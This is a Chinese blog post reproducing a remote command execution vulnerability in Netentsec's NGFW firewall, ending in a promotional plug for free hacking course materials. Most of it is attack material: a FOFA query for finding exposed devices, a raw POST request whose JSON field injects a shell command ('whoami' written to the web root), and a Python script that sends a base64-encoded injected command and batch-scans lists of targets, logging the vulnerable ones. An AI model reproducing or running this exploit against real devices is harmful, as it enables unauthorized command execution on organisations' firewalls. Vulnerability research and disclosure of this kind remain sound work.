声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。
1.前言
2021HW期间,北京网康科技有限公司网康NGFW下一代防火墙被爆出远程命令执行漏洞。CNVD上还没查到漏洞编号,应该是CNVD还未公开该漏洞。但是网上已有人复现和漏洞分析的文章。
2.漏洞概述
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。但该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。
3.漏洞原理
漏洞存在html\applications\directdata\controllers\DirectController.php文件中, 漏洞关键代码:
<img src=“https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ce0777cace1e430caf5ffeaf68d4aef6~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image) 漏洞分析可参考:[www.o2oxy.cn/3433.html](https://link.juejin.cn/?target=https%3A%2F%2Fwww.o2oxy.cn%2F3433.html “https://www.o2oxy.cn/3433.html”” style=“margin: auto” />
4.影响版本
版本未知(20210419之前的版本)
5.漏洞等级
高危
6.漏洞复现
6.1 FOFA实战复现
FOFA关键词:
cert=“11558588834859436962”
POST Payload:
POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/.atest.txt;whoami >/var/www/html/atest.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
6.2 netentsec_NGFW_RCE_POC.py
#!/usr/bin/python
# Env: python3
# Author: afei00123
# -*- coding: utf8 -*-
import requests, urllib3, base64, time, json, argparse
from colorama import init
init(autoreset=True)
def title():print("")print('*'.center(60, '*'))print("网康NGFW下一代防火墙(版本未知)".center(30))print("github:https://github.com/ltfafei".center(50))print("gitee:https://gitee.com/afei00123".center(50))print("CSDN: afei00123.blog.csdn.net".center(50))print("公众号:网络运维渗透".center(40))print("")print('*'.center(60, '*'))print("")
class netentsec_NGFW_POC():def NGFW_RCE_Check(self, url):urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)target_url = f"{url}/directdata/direct/router"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36","Cache-Control": "max-age=0","accept": "image/avif,image/webp,image/apng,image/*,*/*;q=0.8","sec-ch-ua": '"Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"',"sec-ch-ua-mobile": "?0","Upgrade-Insecure-Requests": "1","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Sec-Fetch-Site": "none","Sec-Fetch-Mode": "navigate","Sec-Fetch-User": "?1","Sec-Fetch-Dest": "document","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8","Cookie": "PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A","Content-Type": "application/x-www-form-urlencoded",}payload = base64.b64decode("eyJhY3Rpb24iOiJTU0xWUE5fUmVzb3VyY2UiLCJtZXRob2QiOiJkZWxldGVJbWFnZSIsImRhdGEiOlt7ImRhdGEiOlsiL3Zhci93d3cvaHRtbC8uYXRlc3QudHh0O2VjaG8gYWZlaWNvbWUgPi92YXIvd3d3L2h0bWwvYXRlc3QudHh0Il19XSwidHlwZSI6InJwYyIsInRpZCI6MTcsImY4ODM5cDdycXRqIjoiPSJ9")try:s = requests.session()list_data = s.post(target_url, headers=headers, data=payload, verify=False, timeout=2).json()status = list_data[0]['result'].get("success")if status:print(f"\033[31m[+] {url}极有可能存在远程命令执行漏洞!")with open("NGFW_RCE_vuln.txt", "a+") as f:f.writelines(url + "\n")except Exception as e:print(f"[n] {url}不存在该漏洞。")return urldef NGFW_Batch_Check(self, url, file):if url:return Trueelif file:for url in file:url = url.replace('\n', '')time.sleep(1)self.NGFW_RCE_Check(url)
if (__name__ == "__main__"):title()parser = argparse.ArgumentParser(description="netentsec NGFW RCE POC")parser.add_argument('-u', '--url', type=str,help='Please input target url. eg: https://ip:port')parser.add_argument('-f', '--file', type=argparse.FileType('r'),help='Please input urls file path. eg: c:\\urls.txt')args = parser.parse_args()run_POC = netentsec_NGFW_POC()if args.file:run_POC.NGFW_Batch_Check(args.url, args.file)print("\n[done] 批量探测完成,请查看:NGFW_RCE_vuln.txt")if args.url:run_POC.NGFW_RCE_Check(args.url)
6.3 netentsec_NGFW_RCE_EXP.py
… 这个,没有 原文地址:blog.csdn.net/qq_41490561…
7.漏洞修复
建议联系厂商打补丁升级。## 最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
扫码领取
扫一扫
2005
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
